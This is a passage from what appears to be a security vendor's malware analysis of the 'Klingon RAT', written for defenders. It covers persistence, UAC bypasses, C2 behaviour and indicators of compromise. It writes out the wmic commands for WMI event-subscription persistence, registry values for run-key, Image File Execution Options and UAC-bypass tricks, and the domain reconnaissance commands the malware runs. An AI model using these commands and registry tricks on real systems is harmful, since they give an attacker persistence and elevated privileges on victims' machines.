&lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography&lt;/code&gt; as shown in Figure 2. This
ID will later be sent in a beacon to the Command and Control (C2) server.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig2.png" title="Figure 2: Function that fetches the key" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 2: Function that fetches the key&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Dependency Deployment&lt;span class="hx:absolute hx:-mt-20" id="dependency-deployment"&gt;&lt;/span&gt;
&lt;a href="#dependency-deployment" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;The malware will decompress and drop three Gzip embedded files into the
&lt;code&gt;%temp%&lt;/code&gt; directory. The dropped files are utilities for the threat actor to use
once a C2 channel has been established. The files dropped are &lt;code&gt;Foxmail&lt;/code&gt;,
&lt;code&gt;PAExec&lt;/code&gt; and &lt;code&gt;LSASS&lt;/code&gt;, shown below.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig3.png" title="Figure 3: Head of embedded Foxmail.exe file, Gzip compressed" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 3: Head of embedded Foxmail.exe file, Gzip compressed&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig4.png" title="Figure 4: Dropped dependencies" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 4: Dropped dependencies&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Next, the malware will check to see if it is installed at
&lt;code&gt;C:\Users\IEUser\AppData\Local\Windows Update\updater10.exe&lt;/code&gt;. If not installed,
the malware will be relocated to the path.&lt;/p&gt;
&lt;h3&gt;Persistence&lt;span class="hx:absolute hx:-mt-20" id="persistence"&gt;&lt;/span&gt;
&lt;a href="#persistence" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Persistence can be set up in multiple ways, some of which require admin
privileges. Privilege escalation will be covered in a later section.&lt;/p&gt;
&lt;h4&gt;Registry Run Key: Current User&lt;span class="hx:absolute hx:-mt-20" id="registry-run-key-current-user"&gt;&lt;/span&gt;
&lt;a href="#registry-run-key-current-user" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The following registry entry is created:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Key:&lt;/strong&gt;
&lt;code&gt;Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Name:&lt;/strong&gt; &lt;code&gt;Windows Updater&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Value:&lt;/strong&gt;
&lt;code&gt;&amp;quot;C:\Users\{USER}\AppData\Local\Windows Update\updater10.exe&amp;quot; -1 -0&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig5.png" title="Figure 5: Registry Run Key" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 5: Registry Run Key&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;Registry Run Key: Local Machine&lt;span class="hx:absolute hx:-mt-20" id="registry-run-key-local-machine"&gt;&lt;/span&gt;
&lt;a href="#registry-run-key-local-machine" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;A similar entry as the above is created at:
&lt;code&gt;Computer\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;&lt;/p&gt;
&lt;h4&gt;Image File Execution Options Injection&lt;span class="hx:absolute hx:-mt-20" id="image-file-execution-options-injection"&gt;&lt;/span&gt;
&lt;a href="#image-file-execution-options-injection" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Image File Execution Options are configured by the Windows registry with the
intention of being used for debugging. This can be leveraged for persistence as
any executable can be used as a &amp;ldquo;debugger.&amp;rdquo; The malware ensures the following
keys exist:
&lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Accessibility&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The Image File Execution Options key has the following entries set:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Name&lt;/th&gt;
&lt;th&gt;Data&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Configuration&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;mangnifierpane&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;Debugger&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;&amp;quot;C:\Users\IEUser\AppData\Local\Windows Update\updater10.exe&amp;quot; -1 -0&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;This causes the binary for Microsoft Screen Magnifier (&lt;code&gt;magnify.exe&lt;/code&gt;)
accessibility tool to be backdoored and execute the malware.&lt;/p&gt;
&lt;h4&gt;WMI Event Subscription&lt;span class="hx:absolute hx:-mt-20" id="wmi-event-subscription"&gt;&lt;/span&gt;
&lt;a href="#wmi-event-subscription" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;In this option the malware utilizes &lt;code&gt;WMIC&lt;/code&gt; to create an event subscription for
persistence. Three commands are executed to create events in the
&lt;code&gt;root\subscription&lt;/code&gt; namespace that will start the payload within 60 seconds of
Windows booting up. The commands executed are:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-batch" data-lang="batch"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wmic /namespace:&amp;#39;\root\subscription&amp;#39; PATH __EventFilter CREATE Name=&amp;#39;GuacBypassFilter&amp;#39;, EventNameSpace=&amp;#39;root\cimv2&amp;#39;, QueryLanguage=&amp;#39;WQL&amp;#39;, Query=&amp;#39;SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA &amp;#39;Win32_PerfFormattedData_PerfOS_System&lt;span class="s2"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wmic /namespace:&amp;#39;\root\subscription&amp;#39; PATH CommandLineEventConsumer CREATE Name=&amp;#39;GuacBypassConsumer&amp;#39;, ExecutablePath=&amp;#39;&lt;span class="s2"&gt;&amp;#34;C:\Users\IEUser\AppData\Local\Windows Update\updater10.exe&amp;#34;&lt;/span&gt; -1 -0&amp;#39;, CommandLineTemplate=&amp;#39;&lt;span class="s2"&gt;&amp;#34;C:\Users\IEUser\AppData\Local\Windows Update\updater10.exe&amp;#34;&lt;/span&gt; -1 -0&amp;#39;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;wmic /namespace:&amp;#39;\root\subscription&amp;#39; PATH __FilterToConsumerBinding CREATE Filter=&amp;#39;__EventFilter.Name=&amp;#39;GuacBypassFilter&lt;span class="s2"&gt;&amp;#34;, Consumer=&amp;#39;CommandLineEventConsumer.Name=&amp;#39;GuacBypassConsomer&amp;#34;&lt;/span&gt;)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;h4&gt;Winlogon Helper DLL&lt;span class="hx:absolute hx:-mt-20" id="winlogon-helper-dll"&gt;&lt;/span&gt;
&lt;a href="#winlogon-helper-dll" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The malware can modify the &lt;code&gt;Winlogon&lt;/code&gt; key in order to run itself during Windows
logon. The path of the executable is appended to the &lt;code&gt;Userinit&lt;/code&gt; entry.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig6.png" title="Figure 6: Winlogon registry modified" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 6: Winlogon registry modified&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;Scheduled Task&lt;span class="hx:absolute hx:-mt-20" id="scheduled-task"&gt;&lt;/span&gt;
&lt;a href="#scheduled-task" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;The malware can create a scheduled task called &lt;code&gt;OneDriveUpdate&lt;/code&gt; to maintain
persistence. The task is configured from an XML file, &lt;code&gt;elevator.xml&lt;/code&gt; dropped to
&lt;code&gt;APPDATA&lt;/code&gt;, to trigger upon logon.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig7.png" title="Figure 7: Task configuration file" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 7: Task configuration file&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig8.png" title="Figure 8: Action of triggering the task" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 8: Action of triggering the task&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The file &lt;code&gt;elevator.xml&lt;/code&gt; is then removed from the disk.&lt;/p&gt;
&lt;h3&gt;Privilege Escalation&lt;span class="hx:absolute hx:-mt-20" id="privilege-escalation"&gt;&lt;/span&gt;
&lt;a href="#privilege-escalation" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;There are multiple avenues that the malware can take for privilege escalation.
It will first test to see if it already has admin privileges and if it is a
Windows server. To check if the process has admin privileges, it will attempt
to open &lt;code&gt;\\.\PHYSICALDRIVE0&lt;/code&gt;; if unsuccessful, the malware will attempt to open
&lt;code&gt;\\.\SCSI0&lt;/code&gt;. If successful for either of these, it will return &lt;code&gt;True&lt;/code&gt; from the
function. If &lt;code&gt;False&lt;/code&gt;, the program will check to see if it is a Windows server
by running the command &lt;code&gt;systeminfo&lt;/code&gt;, and parsing for the string
&lt;code&gt;Microsoft Windows Server&lt;/code&gt;, as shown in Figure 9.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig9.png" title="Figure 9: Check for Windows Server" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 9: Check for Windows Server&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The malware has four options for privilege escalation, one of which is not
implemented properly:&lt;/p&gt;
&lt;h4&gt;UAC Bypass: Computer Defaults&lt;span class="hx:absolute hx:-mt-20" id="uac-bypass-computer-defaults"&gt;&lt;/span&gt;
&lt;a href="#uac-bypass-computer-defaults" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;This exploit starts by opening the following registry key:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;HKEY_CURRENT_USER (0x80000001)\Software\Classes\ms-settings\shell\open\command&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;The default entry is set to the path of the malware, and an entry
&lt;code&gt;DelegateExecute&lt;/code&gt; has an empty string value added. Next, the program
&lt;code&gt;computerdefaults.exe&lt;/code&gt; is executed to complete the exploit.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig10.png" title="Figure 10: Registry set for exploit" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 10: Registry set for exploit&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The key is deleted after exploitation.&lt;/p&gt;
&lt;h4&gt;UAC Bypass: Fodhelper&lt;span class="hx:absolute hx:-mt-20" id="uac-bypass-fodhelper"&gt;&lt;/span&gt;
&lt;a href="#uac-bypass-fodhelper" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;This exploit is similar to the Computer Defaults UAC bypass but this time it
leverages the program &amp;ldquo;Features on Demand Helper&amp;rdquo; (&lt;code&gt;Fodhelper.exe&lt;/code&gt;), a binary
with the &lt;code&gt;autoelevate&lt;/code&gt; setting set to true. The same registry entries are used.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig11.png" title="Figure 11: UAC bypass with Fodhelper.exe" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 11: UAC bypass with Fodhelper.exe&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;UAC Bypass: Disk Cleanup&lt;span class="hx:absolute hx:-mt-20" id="uac-bypass-disk-cleanup"&gt;&lt;/span&gt;
&lt;a href="#uac-bypass-disk-cleanup" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;This UAC bypass works by leveraging the scheduled task named &lt;code&gt;SilentCleanup&lt;/code&gt;.
This task runs with the highest privileges but is configured to have the
ability to be executed by unprivileged users.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig12.png" title="Figure 12: Config for SilentCleanup" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 12: Config for SilentCleanup&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The malware attempts to leverage the environment variable &lt;code&gt;%windir%&lt;/code&gt; to execute
itself with higher privileges. The scheduled task runs an action
&lt;code&gt;%windir%\system32\cleanmgr.exe&lt;/code&gt;, therefore the malware tries to set the
&lt;code&gt;windir&lt;/code&gt; variable to the path of the malware.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig13.png" title="Figure 13: Action of the scheduled task (SilentCleanup)" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 13: Action of the scheduled task (SilentCleanup)&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig14.png" title="Figure 14: windir variable set in the registry" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 14: windir variable set in the registry&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;After setting the registry, the malware runs the scheduled task.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig15.png" title="Figure 15: Execution of the scheduled task" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 15: Execution of the scheduled task&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The resulting process:&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig16.png" title="Figure 16: The elevated process" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 16: The elevated process&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h4&gt;UAC Bypass: Event Viewer&lt;span class="hx:absolute hx:-mt-20" id="uac-bypass-event-viewer"&gt;&lt;/span&gt;
&lt;a href="#uac-bypass-event-viewer" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h4&gt;&lt;p&gt;Based on the strings in this path, it appears that the malware intended to
leverage the &amp;ldquo;Event Viewer&amp;rdquo; UAC bypass. But this does not appear to be properly
implemented in the program.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig17.png" title="Figure 17: References to eventvwr in a function called by MakeAdmin parent" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 17: References to eventvwr in a function called by MakeAdmin parent&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h3&gt;Command and Control&lt;span class="hx:absolute hx:-mt-20" id="command-and-control"&gt;&lt;/span&gt;
&lt;a href="#command-and-control" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h3&gt;&lt;p&gt;Before Command and Control (C2) is established the malware initiates a
controller struct:&lt;/p&gt;
&lt;div class="hextra-code-block hx:relative hx:mt-6 hx:first:mt-0 hx:group/code"&gt;
&lt;div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-go" data-lang="go"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kd"&gt;type&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;control&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Controller&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="kd"&gt;struct&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;bot&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;model&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Bot&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;socksSessions&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="nx"&gt;control&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;SocksProxy&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;shellSessions&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt;&lt;span class="nx"&gt;control&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Shell&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;connection&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Conn&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;keepAlive&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nx"&gt;net&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;Conn&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="w"&gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="hextra-code-copy-btn-container hx:opacity-0 hx:transition hx:group-hover/code:opacity-100 hx:flex hx:gap-1 hx:absolute hx:m-[11px] hx:right-0 hx:top-0"&gt;
&lt;button
class="hextra-code-copy-btn hx:group/copybtn hx:cursor-pointer hx:transition-all hx:active:opacity-50 hx:bg-primary-700/5 hx:border hx:border-black/5 hx:text-gray-600 hx:hover:text-gray-900 hx:rounded-md hx:p-1.5 hx:dark:bg-primary-300/10 hx:dark:border-white/10 hx:dark:text-gray-400 hx:dark:hover:text-gray-50"
title="Copy code"
aria-label="Copy code"
data-copied-label="Copied!"
&gt;
&lt;div class="hextra-copy-icon hx:group-[.copied]/copybtn:hidden hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;div class="hextra-success-icon hx:hidden hx:group-[.copied]/copybtn:block hx:pointer-events-none hx:h-4 hx:w-4"&gt;&lt;/div&gt;
&lt;/button&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;First, a x509 keypair is decoded from Base64 and loaded by the function
&lt;code&gt;tls.x509KeyPair&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig18.png" title="Figure 18: Loading x509 key pair" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 18: Loading x509 key pair&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The decoded keypair is
&lt;a href="https://gist.github.com/aslefhewqiwbepqwefbpqsciwueh/b283988a0bf4f2d51f9a3f4697055901"target="_blank" rel="noopener"&gt;linked here&lt;/a&gt;
and
&lt;a href="https://gist.github.com/aslefhewqiwbepqwefbpqsciwueh/bd0ec3fbbf3b1bb1496dd8a53c4fb7e6"target="_blank" rel="noopener"&gt;here&lt;/a&gt;.
Strings from this certificate can be matched to strings in the Issuer DN of a
similar certificate with subject
&amp;ldquo;&lt;a href="https://search.censys.io/certificates/226a9e9c05935884da5507c7647c5e404faf349bdbaf170b9a4c064f7cc697fe"target="_blank" rel="noopener"&gt;UrbanCulture, Inc.&lt;/a&gt;&amp;rdquo;
A further PEM certificate is decoded and appended to the cert pool. A TLS
handshake is performed with the C2 server &lt;code&gt;185.188.183[.]144&lt;/code&gt; on the port
&lt;code&gt;1141&lt;/code&gt; and then creates a Goroutine called &lt;code&gt;Controller.WaitCommands&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The malware is able to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Start a SOCKS proxy (&lt;code&gt;proxy&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Start a reverse shell (&lt;code&gt;shell&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Start an RDP server (&lt;code&gt;rdp&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Start a binary (&lt;code&gt;binary&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Update binary (&lt;code&gt;update&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Run PowerShell command (&lt;code&gt;cmd&lt;/code&gt;)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The malware will initiate further Goroutines to collect information from the
system. If running as administrator, it will run the &lt;code&gt;Lsass&lt;/code&gt; binary previously
dropped into the temp folder.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig19.png" title="Figure 19: Path of the Lsass binary to be executed" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 19: Path of the Lsass binary to be executed&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;The results are stored in a file called &lt;code&gt;Andrew.dmp&lt;/code&gt; inside the temp folder.
This information is sent to the C2 server through a HTTP POST request.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig20.png" title="Figure 20: Location of dump file" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 20: Location of dump file&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;p&gt;Another routine will take a fingerprint of the machine, concatenating the
results into a string, and send this off in a HTTP POST request. It runs the
following commands in this order:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;code&gt;systeminfo&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;ipconfig&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;net view /all&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;net view /all domain&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;net users /domain&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;nltest /domain_trusts&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;nltest /domain_trusts /all_trusts&lt;/code&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Finally, the malware will periodically get information about the local network
and adapters.&lt;/p&gt;
&lt;h2&gt;Detect and Respond to Klingon RAT&lt;span class="hx:absolute hx:-mt-20" id="detect-and-respond-to-klingon-rat"&gt;&lt;/span&gt;
&lt;a href="#detect-and-respond-to-klingon-rat" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;p&gt;Detect if your Windows machine or server has been compromised by Klingon RAT or
any variant that reuses code using the Intezer Analyze
&lt;a href="https://analyze.intezer.com/endpoint-analyses"target="_blank" rel="noopener"&gt;Live Endpoint Scanner&lt;/a&gt;
available via the &lt;a href="https://intezer.com/pricing/"target="_blank" rel="noopener"&gt;enterprise edition&lt;/a&gt;. Running
the scanner will classify all binary code residing in your machine&amp;rsquo;s memory.&lt;/p&gt;
&lt;p&gt;&lt;figure&gt;
&lt;img src="https://research.intezer.com/blog/2021/06/klingon-rat-holding-on-for-dear-life/images/fig21.png" title="Figure 21: Endpoint scan of an infected system" alt="" loading="lazy" /&gt;
&lt;figcaption&gt;Figure 21: Endpoint scan of an infected system&lt;/figcaption&gt;
&lt;/figure&gt;&lt;/p&gt;
&lt;h2&gt;Indicators of Compromise&lt;span class="hx:absolute hx:-mt-20" id="indicators-of-compromise"&gt;&lt;/span&gt;
&lt;a href="#indicators-of-compromise" class="subheading-anchor" aria-label="Permalink for this section"&gt;&lt;/a&gt;&lt;/h2&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;MD5&lt;/th&gt;
&lt;th&gt;C2&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;8d44ccac6b5512a416339984ad664d79&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;185.188.183[.]144&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;14471a353788bb6cdb6071d0e0a83004&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;&lt;code&gt;94.177.123[.]134&lt;/code&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
